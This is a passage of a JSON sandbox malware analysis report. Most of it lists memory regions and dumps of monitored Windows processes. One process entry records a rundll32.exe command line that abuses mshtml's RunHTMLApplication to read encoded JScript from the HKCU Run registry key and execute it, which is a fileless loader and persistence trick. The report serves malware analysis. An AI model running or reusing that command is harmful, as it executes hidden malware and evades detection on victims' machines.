"region", "version": 1 }, "end_va": 1959723007, "entry_point": 1959657472, "filename": "\\Windows\\SysWOW64\\NapiNSP.dll", "id": "region_223", "name": "napinsp.dll", "norm_filename": "c:\\windows\\syswow64\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1959657472, "timestamp": "00:00:14.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1959526400, "type": "region", "version": 1 }, "end_va": 1959600127, "entry_point": 1959526400, "filename": "\\Windows\\SysWOW64\\pnrpnsp.dll", "id": "region_224", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\syswow64\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1959526400, "timestamp": "00:00:14.723", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1959460864, "type": "region", "version": 1 }, "end_va": 1959493631, "entry_point": 1959460864, "filename": "\\Windows\\SysWOW64\\winrnr.dll", "id": "region_225", "name": "winrnr.dll", "norm_filename": "c:\\windows\\syswow64\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1959460864, "timestamp": "00:00:14.737", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1959198720, "type": "region", "version": 1 }, "end_va": 1959428095, "entry_point": 1959198720, "filename": "\\Windows\\SysWOW64\\FWPUCLNT.DLL", "id": "region_226", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\syswow64\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1959198720, "timestamp": "00:00:14.750", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000227-addr_0x0000000002370000-size_0x0000000000110000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1114112, "start_va": 37158912, "type": "region", "version": 1 }, "end_va": 38273023, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x0000000002370000", "norm_filename": null, "region_type": "private_memory", "start_va": 37158912, "timestamp": "00:00:14.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959157759, "entry_point": 1959133184, "filename": "\\Windows\\SysWOW64\\rasadhlp.dll", "id": "region_228", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\syswow64\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:00:14.767", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000229-addr_0x0000000000390000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3739647, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:35.828", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1938489344, "type": "region", "version": 1 }, "end_va": 1939013631, "entry_point": 1938489344, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_230", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1938489344, "timestamp": "00:00:35.833", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000231-addr_0x0000000002270000-size_0x00000000000f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 983040, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 37093375, "entry_point": 0, "filename": null, "id": "region_231", "name": "private_0x0000000002270000", "norm_filename": null, "region_type": "private_memory", "start_va": 36110336, "timestamp": "00:00:35.887", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000232-addr_0x0000000002360000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 37093376, "type": "region", "version": 1 }, "end_va": 37158911, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x0000000002360000", "norm_filename": null, "region_type": "private_memory", "start_va": 37093376, "timestamp": "00:00:35.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 38273024, "type": "region", "version": 1 }, "end_va": 39186431, "entry_point": 0, "filename": null, "id": "region_233", "name": "pagefile_0x0000000002480000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38273024, "timestamp": "00:00:35.893", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000234-addr_0x0000000000390000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3751935, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:35.910", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000235-addr_0x00000000003a0000-size_0x0000000000005000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 20480, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3821567, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:00:35.912", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000236-addr_0x00000000003b0000-size_0x0000000000006000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 24576, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3891199, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:00:35.913", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000237-addr_0x00000000003c0000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3964927, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:00:35.944", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000238-addr_0x00000000003d0000-size_0x0000000000013000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 77824, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4075519, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x00000000003d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3997696, "timestamp": "00:00:35.945", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4132863, "entry_point": 0, "filename": null, "id": "region_239", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:00:35.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970614271, "entry_point": 1970077696, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_240", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:00:35.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_241", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:35.963", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000242-addr_0x00000000004b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_242", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:00:35.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1959108607, "entry_point": 1958936576, "filename": "\\Windows\\SysWOW64\\scrrun.dll", "id": "region_243", "name": "scrrun.dll", "norm_filename": "c:\\windows\\syswow64\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:00:35.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1958907903, "entry_point": 1958871040, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_244", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:00:36.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1958477824, "type": "region", "version": 1 }, "end_va": 1958866943, "entry_point": 1958477824, "filename": "\\Windows\\SysWOW64\\sxs.dll", "id": "region_245", "name": "sxs.dll", "norm_filename": "c:\\windows\\syswow64\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1958477824, "timestamp": "00:00:36.113", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 86016, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 4476927, "entry_point": 4396018, "filename": "\\Windows\\SysWOW64\\scrrun.dll", "id": "region_246", "name": "scrrun.dll", "norm_filename": "c:\\windows\\syswow64\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 4390912, "timestamp": "00:00:36.178", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 86016, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4607999, "entry_point": 4527090, "filename": "\\Windows\\SysWOW64\\scrrun.dll", "id": "region_247", "name": "scrrun.dll", "norm_filename": "c:\\windows\\syswow64\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 4521984, "timestamp": "00:00:36.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 1957101568, "type": "region", "version": 1 }, "end_va": 1957830655, "entry_point": 1957101568, "filename": "\\Windows\\SysWOW64\\jscript.dll", "id": "region_248", "name": "jscript.dll", "norm_filename": "c:\\windows\\syswow64\\jscript.dll", "region_type": "memory_mapped_file", "start_va": 1957101568, "timestamp": "00:00:36.199", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000681-addr_0x0000000000470000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_681", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:00:47.729", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000682-addr_0x00000000006c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 7340031, "entry_point": 0, "filename": null, "id": "region_682", "name": "private_0x00000000006c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7077888, "timestamp": "00:00:47.729", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000683-addr_0x0000000002560000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 39190528, "type": "region", "version": 1 }, "end_va": 40239103, "entry_point": 0, "filename": null, "id": "region_683", "name": "private_0x0000000002560000", "norm_filename": null, "region_type": "private_memory", "start_va": 39190528, "timestamp": "00:00:47.729", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000684-addr_0x0000000002660000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_187", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 40239104, "type": "region", "version": 1 }, "end_va": 41287679, "entry_point": 0, "filename": null, "id": "region_684", "name": "private_0x0000000002660000", "norm_filename": null, "region_type": "private_memory", "start_va": 40239104, "timestamp": "00:00:47.730", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000685-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_188", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_685", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:47.730", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000686-addr_0x000000007efd5000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_189", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_686", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:47.731", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", "filename": "c:\\windows\\system32\\rundll32.exe", "id": "proc_2", "image_name": "rundll32.exe", "monitor_reason": "child_process", "monitored_id": 2, "origin_monitor_id": 1, "ref_parent_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000002-region_00000249-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_249", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:36.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_250", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:36.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_251", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:36.327", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000252-addr_0x0000000000110000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_252", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:00:36.327", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2000158720, "type": "region", "version": 1 }, "end_va": 2001899519, "entry_point": 2000158720, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_253", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2000158720, "timestamp": "00:00:36.328", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_254", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:36.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000255-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_255", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:36.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000256-addr_0x000000007fff4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147434496, "type": "region", "version": 1 }, "end_va": 2147438591, "entry_point": 0, "filename": null, "id": "region_256", "name": "private_0x000000007fff4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147434496, "timestamp": "00:00:36.330", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 4280549376, "type": "region", "version": 1 }, "end_va": 4280610815, "entry_point": 4280549376, "filename": "\\Windows\\System32\\rundll32.exe", "id": "region_257", "name": "rundll32.exe", "norm_filename": "c:\\windows\\system32\\rundll32.exe", "region_type": "memory_mapped_file", "start_va": 4280549376, "timestamp": "00:00:36.330", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791788224512, "type": "region", "version": 1 }, "end_va": 8791788228607, "entry_point": 8791788224512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_258", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791788224512, "timestamp": "00:00:36.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_259", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:36.338", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000260-addr_0x000007fffffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_260", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:00:36.339", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000261-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_261", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:00:36.339", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000262-addr_0x0000000000330000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 4390911, "entry_point": 0, "filename": null, "id": "region_262", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:36.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1998979072, "type": "region", "version": 1 }, "end_va": 2000154623, "entry_point": 1998979072, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_263", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1998979072, "timestamp": "00:00:36.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754211328, "type": "region", "version": 1 }, "end_va": 8791754649599, "entry_point": 8791754211328, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_264", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754211328, "timestamp": "00:00:36.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_265", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:36.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_266", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:36.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1997930496, "type": "region", "version": 1 }, "end_va": 1998954495, "entry_point": 1997930496, "filename": "\\Windows\\System32\\user32.dll", "id": "region_267", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1997930496, "timestamp": "00:00:36.563", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_268", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:36.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_269", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:36.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791754997760, "type": "region", "version": 1 }, "end_va": 8791755091967, "entry_point": 8791754997760, "filename": "\\Windows\\System32\\imagehlp.dll", "id": "region_270", "name": "imagehlp.dll", "norm_filename": "c:\\windows\\system32\\imagehlp.dll", "region_type": "memory_mapped_file", "start_va": 8791754997760, "timestamp": "00:00:36.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 